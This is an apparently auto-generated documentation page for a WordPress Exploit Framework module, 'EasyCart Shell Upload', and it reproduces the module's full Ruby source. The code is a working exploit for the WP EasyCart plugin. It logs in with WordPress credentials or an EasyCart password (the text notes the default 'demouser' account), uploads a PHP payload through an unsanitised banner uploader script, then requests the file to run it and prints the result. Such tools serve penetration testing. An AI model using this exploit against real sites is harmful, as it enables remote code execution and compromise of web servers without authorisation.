Class: Wpxf::Exploit::EasyCartShellUpload

Inherits:
Module
  • Object
Includes:
Wpxf, Net::HttpClient, WordPress::Login
Defined in:
lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb

Constant Summary

Constants included from Net::HttpOptions

Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST

Constants included from WordPress::Options

WordPress::Options::WP_OPTION_CONTENT_DIR

Instance Attribute Summary

Attributes inherited from Module

#active_workspace, #event_emitter, #payload, #session_cookie

Attributes included from Options

#datastore, #options

Instance Method Summary

Methods included from WordPress::Login

#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body

Methods included from Net::HttpClient

#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri

Methods included from Net::TyphoeusHelper

#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options

Methods included from Net::UserAgent

#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent

Methods included from Versioning::OSVersions

#random_nt_version, #random_osx_version

Methods included from Versioning::BrowserVersions

#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version

Methods included from Wpxf

app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version

Methods inherited from Module

#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #set_option_value, #unset_option

Methods included from Db::Credentials

#store_credentials

Methods included from ModuleAuthentication

#authenticate_with_wordpress, #requires_authentication

Methods included from WordPress::Urls

#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc

Methods included from WordPress::Options

#wp_content_dir

Methods included from WordPress::Fingerprint

#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version

Methods included from Options

#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option

Methods included from OutputEmitters

#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning

Methods included from ModuleInfo

#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info

Constructor Details

#initialize ⇒ EasyCartShellUpload

Returns a new instance of EasyCartShellUpload.



# File 'lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb', line 8

# Registers the module metadata and the credential options this exploit needs.
#
# Two authentication paths are exposed: WordPress username/password (for
# plugin versions <= 3.0.8) and the EasyCart admin password, supplied either
# in clear or, when ec_password_is_hash is set, already as an MD5 hex digest.
# A stock EasyCart install ships a "demouser"/"demouser" account, which is why
# the description calls it out.
def initialize
  super

  description =
    'WordPress Shopping Cart (WP EasyCart) Plugin for WordPress '\
    'contains a flaw that allows a remote attacker to execute '\
    'arbitrary PHP code. This flaw exists because the '\
    '/inc/amfphp/administration/banneruploaderscript.php script does '\
    'not properly verify or sanitize user-uploaded files. By '\
    'uploading a .php file, the remote system will place the file in '\
    'a user-accessible path. Making a direct request to the uploaded '\
    'file will allow the attacker to execute the script with the '\
    'privileges of the web server.'\
    "\n"\
    'In versions <= 3.0.8 authentication can be done by using the '\
    'WordPress credentials of a user with any role. In later '\
    'versions, a valid EasyCart admin password will be required that '\
    'is in use by any admin user. A default installation of EasyCart '\
    'will setup a user called "demouser" with a preset password '\
    'of "demouser".'

  update_info(
    name: 'EasyCart Shell Upload',
    desc: description,
    # Vulnerability disclosure, then WPXF module author.
    author: ['Kacper Szurek', 'rastating'],
    references: [['WPVDB', '7745']],
    date: 'Jan 08 2015'
  )

  credential_options = [
    StringOption.new(
      name: 'username',
      desc: 'The WordPress username to authenticate with (versions <= 3.0.8)'
    ),
    StringOption.new(
      name: 'password',
      desc: 'The WordPress password to authenticate with (versions <= 3.0.8)'
    ),
    StringOption.new(
      name: 'ec_password',
      desc: 'The EasyCart password to authenticate with (versions <= 3.0.18)'
    ),
    BooleanOption.new(
      name: 'ec_password_is_hash',
      desc: 'Whether or not ec_password is an MD5 hash',
      default: false
    )
  ]
  register_options(credential_options)
end

Instance Method Details

#check ⇒ Object



# File 'lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb', line 92

# Fingerprints the installed plugin from its readme, passing 3.0.19 as the
# version boundary; the option descriptions target releases <= 3.0.18.
def check
  plugin_slug = 'wp-easycart'
  boundary_version = '3.0.19'
  check_plugin_version_from_readme(plugin_slug, boundary_version)
end

#ec_password ⇒ Object



# File 'lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb', line 68

# The ec_password option as normalised by the framework (nil/empty when unset).
def ec_password
  option_key = 'ec_password'
  normalized_option_value option_key
end

#ec_password_is_hash ⇒ Object



# File 'lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb', line 72

# Whether ec_password is already an MD5 hex digest rather than a clear-text
# password (see #req_id for how this changes the reqID value).
def ec_password_is_hash
  option_key = 'ec_password_is_hash'
  normalized_option_value option_key
end

#password ⇒ Object



# File 'lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb', line 64

# The WordPress password option as normalised by the framework.
def password
  option_key = 'password'
  normalized_option_value option_key
end

#payload_body_builder(date_hash, payload_name, include_req_id) ⇒ Object



# File 'lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb', line 104

# Builds the multipart form body posted to banneruploaderscript.php.
#
# @param date_hash [String] value of the datemd5 field; #run also expects it
#   to appear in the stored file name
# @param payload_name [String] file name given to the Filedata part
# @param include_req_id [Boolean] when true, adds the reqID field carrying the
#   hashed EasyCart password (#req_id), needed where EC authentication applies
# @return [Utility::BodyBuilder] builder holding the encoded payload
def payload_body_builder(date_hash, payload_name, include_req_id)
  Utility::BodyBuilder.new.tap do |form|
    form.add_field('datemd5', date_hash)
    form.add_file_from_string('Filedata', payload.encoded, payload_name)
    form.add_field('reqID', req_id) if include_req_id
  end
end

#plugin_url ⇒ Object



# File 'lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb', line 96

# Base URL of the wp-easycart plugin directory under the WordPress plugins path.
def plugin_url
  plugin_slug = 'wp-easycart'
  normalize_uri(wordpress_url_plugins, plugin_slug)
end

#req_id ⇒ Object



# File 'lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb', line 84

# Value for the reqID form field: the EasyCart password as an MD5 hex digest.
# When ec_password_is_hash is set the option is taken to be the digest already
# and is sent unchanged; otherwise it is hashed here.
def req_id
  ec_password_is_hash ? ec_password : Utility::Text.md5(ec_password)
end

#run ⇒ Object



# File 'lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb', line 112

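# Authenticates (WordPress session and/or EasyCart password), uploads the
# payload through banneruploaderscript.php and then requests it once.
#
# @return [Boolean] false when no credentials are set, WordPress login fails
#   with no EC fallback, or the upload request does not return 200; true
#   otherwise (a failed follow-up GET is only warned about).
def run
  return false unless super

  # The uploader is reached either with a WordPress session cookie or with the
  # EasyCart password in the reqID field, so at least one set is mandatory.
  if !use_wordpress_authentication && !use_ec_authentication
    emit_error 'You must set either the username and password options or '\
               'specify an ec_password value'
    return false
  end

  if use_wordpress_authentication && use_ec_authentication
    emit_info 'Both EasyCart and WordPress credentials were supplied, '\
              'attempting WordPress first...'
  end

  # Session cookie for the upload request; stays nil when WordPress
  # authentication is not attempted.
  cookie = nil
  if use_wordpress_authentication
    # NOTE(review): the clear-text password is echoed to the console here, in
    # line with other wpxf modules; keep that in mind when sharing output.
    emit_info "Authenticating using #{username}:#{password}..."
    # Restored the call that the rendered page had lost: the login helper from
    # WordPress::Login returns the session cookie (falsy on failure).
    cookie = wordpress_login(username, password)

    if cookie
      emit_success 'Authenticated with WordPress', true
    elsif use_ec_authentication
      emit_warning 'Failed to authenticate with WordPress, attempting '\
                   'upload with EC password next...'
    else
      emit_error 'Failed to authenticate with WordPress'
      return false
    end
  end

  emit_info 'Preparing payload...'
  payload_name = Utility::Text.rand_alpha(10)
  date_hash = Utility::Text.md5(Time.now.to_s)
  # The module expects the uploader to store the file as <name>_<datemd5>.php
  # under products/banners; the upload itself is sent as <name>.php.
  uploaded_filename = "#{payload_name}_#{date_hash}.php"
  payload_url = normalize_uri(plugin_url, 'products', 'banners', uploaded_filename)
  builder = payload_body_builder(
    date_hash,
    "#{payload_name}.php",
    use_ec_authentication
  )

  emit_info 'Uploading payload...'
  res = nil
  builder.create do |body|
    res = execute_post_request(url: uploader_url, body: body, cookie: cookie)
  end

  # res is nil when no response came back at all; the original read res.code
  # unconditionally in that branch and raised NoMethodError instead of reporting.
  if res.nil? || res.code != 200
    emit_error 'Failed to upload payload'
    if res.nil?
      emit_error 'No response received from the server', true
    else
      emit_error "Server responded with code #{res.code}", true
    end
    return false
  end

  # A 200 from the uploader only shows the script answered; the GET below is
  # the actual evidence that the file exists at the expected path.
  emit_info 'Executing the payload...'
  res = execute_get_request(url: payload_url)
  if res && res.code == 200 && !res.body.strip.empty?
    emit_success "Result: #{res.body}"
  elsif res.nil? || res.code != 200
    status = res.nil? ? 'no response' : "code #{res.code}"
    emit_warning "Payload request returned #{status}; the file may not have "\
                 'been stored at the expected path', true
  end

  true
end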

#uploader_url ⇒ Object



# File 'lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb', line 100

# URL of the vulnerable banner uploader script inside the plugin directory.
def uploader_url
  script_path = %w[inc amfphp administration banneruploaderscript.php]
  normalize_uri(plugin_url, *script_path)
end

#use_ec_authentication ⇒ Object



# File 'lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb', line 80

# True when an EasyCart password was supplied, i.e. reqID should be sent.
def use_ec_authentication
  !ec_password.to_s.empty?
end

#use_wordpress_authentication ⇒ Object



# File 'lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb', line 76

# True only when both a WordPress username and password were supplied.
def use_wordpress_authentication
  [username, password].none? { |value| value.to_s.empty? }
end

#username ⇒ Object



# File 'lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb', line 60

# The WordPress username option as normalised by the framework.
def username
  option_key = 'username'
  normalized_option_value option_key
end